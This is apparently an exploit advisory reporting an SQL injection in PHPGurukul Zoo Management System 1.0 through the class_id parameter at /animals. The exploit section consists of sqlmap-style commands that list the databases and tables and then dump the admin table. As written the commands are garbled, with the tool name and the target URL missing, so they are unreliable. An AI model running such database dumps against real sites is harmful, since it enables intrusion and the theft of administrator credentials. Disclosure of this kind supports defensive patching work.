PHPGurukul Zoo Management System 1.0 SQL Injection

PHPGurukul Zoo Management System version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | ab1b41c40f9503eb7fc1497d5473a608

# Zoo Management System SQL Injection
# Author: D4rkP0w4r
* Description => sql injection at /animals?class_id=1
* Injection Point

# Exploit
* Exploit with Sqlmap
python3 -u -dbs

python3 -u -tables -D zoomanagement

python3 -u -columns -D zoomanagement -T admin -dump

# Vulnerable Code

* No filter `class_id` when inserting data to database

Related Posts